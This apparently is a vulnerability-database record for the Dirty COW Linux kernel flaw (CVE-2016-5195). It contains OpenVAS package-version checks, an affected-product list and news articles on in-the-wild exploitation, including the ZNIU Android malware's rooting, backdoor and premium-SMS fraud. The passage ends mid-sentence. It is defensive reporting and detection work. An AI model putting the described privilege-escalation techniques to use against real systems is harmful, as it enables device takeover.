kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could exploit this vulnerability to gain write access to otherwise read-only memory mappings and thus obtain the highest privileges on the system. (Vulnerability ID: HWPSIRT-2016-10050)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2016-5195.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to escalate the privilege levels to obtain administrator privilege.\");\n\n script_tag(name:\"affected\", value:\"5288 V3 versions V100R003C00\n\n9032 versions V100R001C00 V100R001C00SPC101 V100R001C00SPC200\n\nAC6605 versions V200R006C00\n\nAgile Controller-Campus versions V100R002C00 V100R002C10 V100R002C10SPC400 V100R002C10SPC403\n\nAustin versions V100R001C10B290 V100R001C10B680 V100R001C20B110 V100R001C30 V100R001C50\n\nBH620 V2 versions V100R002C00\n\nBH621 V2 versions V100R002C00\n\nBH622 V2 versions V100R002C00\n\nBH640 V2 versions V100R002C00\n\nBalong GU versions V800R200C50B200 V800R200C55B200\n\nBalong GUL versions V700R110C30 V700R110C31 V700R200C00 V700R220C30 V700R500C30 V700R500C31\n\nCAM-L21 versions Versions earlier than C576B130\n\nCH121 V3 versions V100R001C00\n\nCH140 V3 versions V100R001C00\n\nCH220 V3 versions V100R001C00\n\nCH222 V3 versions V100R001C00\n\nCH225 V3 versions V100R001C00\n\nCH226 V3 versions V100R001C00\n\nCarrier-eLog versions V200R003C10\n\nChicago versions V100R001C10\n\nCloudOpera CSM versions SysTool(OSUpgrade)V200R016C10SPC100 SysTool(OSUpgrade)V200R016C10SPC100B021 V200R016C10SPC600\n\nDallas versions V100R001C10\n\nE5573Cs-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5573s-320 versions TCPU-V200R001B180D11SP00C00\n\nE5673s-609 versions Versions earlier than TCPU-V200R001B328D01SP00C00\n\nE5771s-856 versions Versions earlier than TCPU-V200R001B329D07SP00C00\n\nE5878s-32 versions TCPU-V200R001B280D01SP05C00\n\nE6000 Chassis versions V100R001C00\n\nEnterprise Service Solution EIDC versions V100R001C60\n\nFusionCompute versions V100R003C10SPC600 V100R005C00 V100R005C10 V100R005C10U1_B1075917\n\nFusionCube versions V100R002C60RC1\n\nFusionManager versions V100R003C00 V100R003C10 V100R005C00 V100R005C00SPC100 V100R005C00SPC200 V100R005C00SPC300 V100R005C10 V100R005C10SPC300 V100R005C10SPC500 V100R005C10SPC700 V100R005C10SPC703 V100R005C10SPC720T V100R005C10U1_B1075133 V100R005C10U2\n\nFusionStorage Block versions V100R003C00 V100R003C02 V100R003C30\n\nFusionStorage Object versions V100R002C00 V100R002C01\n\nHiDPTAndroid versions V200R001C00 V300R001C00\n\nHiSTBAndroid versions V600R003C00SPC010\n\nHuawei solutions for SAP HANA versions V100R001C00\n\nIPC6122-D versions V100R001C10\n\nIPC6611-Z30-I versions V100R001C00\n\nKII-L21 versions C10B130CUSTC10D003 C185B130CUSTC185D002 C185B140CUSTC185D004 C636B310CUSTC636D001 OTA-C02B131CUSTC02D002 OTA-C185B140CUSTC185D004 OTA-C185B310CUSTC185D004 OTA-C636B140CUSTC636D004 OTA-C636B310CUSTC636D001 OTA-C636B320CUSTC636D001 Versions earlier than C02B140CUSTC02D001 Versions earlier than C10B150CUSTC10D003 Versions earlier than C185B321CUSTC185D001 Versions earlier than C464B140 Versions earlier than C629B140CUSTC629D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B160CUSTC636D001 Versions earlier than C636B330CUSTC636D002 Versions earlier than C900B130 Versions earlier than C96B140CUSTC96D004\n\nL2800 versions V100R001C00SPC200\n\nLogCenter versions V100R001C10\n\nNEM-AL10 versions Versions earlier than C00B355\n\nNMO-L22 versions Versions earlier than C569B150\n\nOTA- versions KII-L21C636B150CUSTC636D005\n\nOceanStor 18500 versions V100R001C10\n\nOceanStor 18500 V3 versions V300R003C10\n\nOceanStor 18800 V3 versions V300R003C00\n\nOceanStor 5600 V3 versions V300R003C00 V300R003C10\n\nOceanStor Backup Software versions V100R002C00 V100R002C00LHWS01_P385795 V100R002C00SPC200 V200R001C00 V200R001C00SPC200\n\nOceanStor CSE versions V100R001C01SPC103 V100R001C01SPC106 V100R001C01SPC109 V100R001C01SPC112 V100R002C00LSFM01CP0001 V100R002C00LSFM01SPC101 V100R002C00LSFM01SPC102 V100R002C00LSFM01SPC106\n\nOceanStor HDP3500E versions V100R002C00 V100R003C00\n\nOceanStor HVS85T versions V100R001C00 V100R001C10 V100R001C30\n\nOceanStor HVS88T versions V100R001C00\n\nOceanStor N8500 versions V200R001C09 V200R001C91 V200R001C91SPC900\n\nOceanStor Onebox versions V100R003C10\n\nOceanStor ReplicationDirector versions V200R001C00\n\nOnebox Solution versions V100R005C00 V1R5C00RC2\n\nRH1288 V2 versions V100R002C00\n\nRH1288 V3 versions V100R003C00\n\nRH1288A V2 versions V100R002C00\n\nRH2285 V2 versions V100R002C00\n\nRH2285H V2 versions V100R002C00\n\nRH2288 V2 versions V100R002C00\n\nRH2288 V3 versions V100R003C00\n\nRH2288A V2 versions V100R002C00\n\nRH2288E V2 versions V100R002C00\n\nRH2288H V2 versions V100R002C00\n\nRH2288H V3 versions V100R003C00\n\nRH2485 V2 versions V100R002C00\n\nRH5885 V3 versions V100R003C01 V100R003C10\n\nRH5885H V3 versions V100R003C00 V100R003C10\n\nRH8100 V3 versions V100R003C00\n\nV1300N versions V100R002C02\n\nVCM versions V100R001C00 V100R001C10 V100R001C20\n\nVIE-L29 versions Versions earlier than C185B384 Versions earlier than C605B370\n\nX6000 versions V100R002C00\n\nX6800 versions V100R003C00\n\neCloud CC versions V100R001C01LSHU01\n\neLog versions V200R003C10 V200R003C20\n\neOMC910 versions V100R003C00\n\neSight versions V300R003C20 V300R005C00SPC200\n\neSight Network versions V300R006C00 V300R007C00\n\neSpace 8950 versions V200R003C00\n\neSpace IPC versions V100R001C21 V200R001C01 V200R001C02\n\neSpace VCN3000 versions V100R001C01 V100R002C00 V100R002C10 V100R002C20\n\ninCloud Eye versions V200R001C21 V200R001C30\n\ninCloud Payment versions V200R001C30\n\ninCloud Shield versions V200R001C30\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161207-01-dirtycow-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842926", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842926", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3106-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3106-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842926\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:08 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3106-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1032-snapdragon\", ver:\"4.4.0-1032.36\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:57:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120746", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120746", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-757)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120746\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:28 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-757)\");\n script_tag(name:\"insight\", value:\"CVE-2016-5195 kernel: mm: privilege escalation via MAP_PRIVATE COW breakageA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-757.html\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~4.4.23~31.54.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2016-10-27T00:00:00", "id": "OPENVAS:1361412562310882584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882584", "type": "openvas", "title": "CentOS Update for kernel CESA-2016:2105 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2016:2105 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882584\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-27 05:39:59 +0200 (Thu, 27 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:2105 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the\nLinux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory\nmappings. An unprivileged, local user could use this flaw to gain write\naccess to otherwise read-only memory mappings and thus increase their\nprivileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:2105\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-October/022134.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~642.6.2.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-07T00:00:00", "id": "OPENVAS:1361412562310871972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871972", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-c8a0c7eece", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c8a0c7eece\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871972\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:22:15 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c8a0c7eece\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c8a0c7eece\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NWMDLBWMGZKFHMRJ7QUQVCERP5QHDB6W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.3~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:54", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2015-1805"], "description": "[](<https://1.bp.blogspot.com/-7vcEW_qFiVk/WcpSusfMk5I/AAAAAAAAAQE/t7ztmUGPl3wer04_MGfTLJ1Wn30Pu27FgCLcBGAs/s1600/dirtycow-android-malware.png>)\n\nNearly a year after the disclosure of the [Dirty COW vulnerability](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>) that affected the Linux kernel, cybercriminals have started exploiting the vulnerability against Android users, researchers have warned. \n \nPublicly disclosed last year in October, Dirty COW was present in a section of the Linux kernel\u2014a part of virtually every Linux distribution, including Red Hat, Debian, and Ubuntu\u2014for years and was actively exploited in the wild. \n \nThe vulnerability allows an unprivileged local attacker to gain root access through a race condition issue, gain access to read-only root-owned executable files, and permit remote attacks. \n \nHowever, security researchers from Trend Micro published a [blog post](<http://blog.trendmicro.com/trendlabs-security-intelligence/zniu-first-android-malware-exploit-dirty-cow-vulnerability/>) on Monday disclosing that the privilege escalation vulnerability (CVE-2016-5195), known as Dirty COW, has now been actively exploited by a malware sample of ZNIU, detected as AndroidOS_ZNIU. \n \nThis is the first time we have seen a malware sample to contain an exploit for the vulnerability designed to compromise devices running on the mobile platform. \n \n\n\n### This Dirty Cow Exploit found in Over 1,200 Android Apps\n\n \nThe malware uses the Dirty COW exploit to root Android devices via the copy-on-write (COW) mechanism in Android's Linux kernel and install a backdoor which can then be used by attackers to collect data and generate profit through a premium rate phone number. \n \nTrend Micro researchers detected the ZNIU malware in more than 1,200 malicious Android apps\u2014some of which disguised themselves as pornography and gaming apps\u2014alongside host websites containing malware rootkits that exploit Dirty Cow. \n \nWhile the Dirty Cow flaw impacts all versions of the Android operating system, the ZNIU's Dirty Cow exploit only affects Android devices with ARM/X86 64-bit architecture. However, the recent exploit can be used to bypass SELinux and plant backdoors. \n\n\n> \"We monitored six ZNIU rootkits, four of which were Dirty COW exploits. The other two were KingoRoot, a rooting app, and the Iovyroot exploit (CVE-2015-1805),\" the researchers said. \n\n> \"ZNIU used KingoRoot and Iovyroot because they can root ARM 32-bit CPU devices, which the rootkit for Dirty COW cannot.\"\n\n \n\n\n### Here's How the ZNIU's Dirty Cow exploit Works\n\n \n\n\n[](<https://3.bp.blogspot.com/-edAfrwmUa1o/WcpbZA19nhI/AAAAAAAAC1w/knqWT_NVbTcGjM3FcexOtFvRBbyMKiYoACLcBGAs/s1600/dirty-cow-android-malware.jpg>)\n\nOnce downloaded and installed, the ZNIU malware-carrying app communicates with its command-and-control (C&amp;C) server to check for code updates, while simultaneously the Dirty Cow exploit provides local privilege escalation to gain root access on the device, bypass system restrictions and _\"plant a backdoor for potential remote control attacks in the future.\"_ \n \nThe malware also harvests the carrier information of the user and attempts to send payments via premium SMS messages that were directed to a dummy company in China. \n \nOnce the SMS transaction is over, the malware also deletes the messages from the device in order to erase evidence of any compromise. \n \nThe researchers found the malware has already infected more than 5,000 Android users across 40 countries in recent weeks, with the majority of victims found in China and India, while other resides in the United States, Japan, Canada, Germany and Indonesia. \n \nGoogle has released [an update for Android](<https://source.android.com/security/bulletin/2016-12-01>) that, among other fixes, officially fixes the Dirty COW vulnerability. The tech giant also confirmed that its **[Play Protect](<https://thehackernews.com/2017/05/google-play-protect-android.html>)** now protects Android users against this malware. \n \nThe easiest way to prevent yourself from being targeted by such clever malware is to avoid downloading apps from third-party sources and always stick to the official Google Play Store.\n", "modified": "2017-09-26T13:57:30", "published": "2017-09-26T02:52:00", "id": "THN:1F1264BE105BBA74057A5E702B33D71F", "href": "https://thehackernews.com/2017/09/dirty-cow-android-malware.html", "type": "thn", "title": "First Android Malware Found Exploiting Dirty COW Linux Flaw to Gain Root Privileges", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:18:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "[](<https://3.bp.blogspot.com/-iDWfxV-PPM8/WAnl79IpuHI/AAAAAAAAp5Y/5lTGfIqtuFYbi_zfNU_ORAiUfLceVljCACLcB/s1600/dirty-cow-linux-kernel-exploit.png>)\n\nA nine-year-old critical vulnerability has been discovered in virtually all versions of the Linux operating system and is actively being exploited in the wild. \n \nDubbed \"**Dirty COW**,\" the Linux kernel security flaw (CVE-2016-5195) is a mere privilege-escalation vulnerability, but researchers are taking it extremely seriously due to many reasons. \n \nFirst, it's very easy to develop exploits that work reliably. Secondly, the Dirty COW flaw exists in a section of the Linux kernel, which is a part of virtually every distro of the open-source operating system, including RedHat, Debian, and Ubuntu, released for almost a decade. \n \nAnd most importantly, the researchers have discovered attack code that indicates the Dirty COW vulnerability is being actively exploited in the wild. \n \nDirty COW potentially allows any installed malicious app to gain administrative (root-level) access to a device and completely hijack it within just 5 seconds. \n \nEarlier this week, [Linus Torvalds admitted](<https://lkml.org/lkml/2016/10/19/860>) that 11 years ago he first spotted this issue and also tried to fix it, but then he left it unpatched because at the time it was hard to trigger. \n \n\n\n### Why is the Flaw called Dirty COW?\n\n \nThe bug, marked as \"High\" priority, gets its name from the copy-on-write (COW) mechanism in the Linux 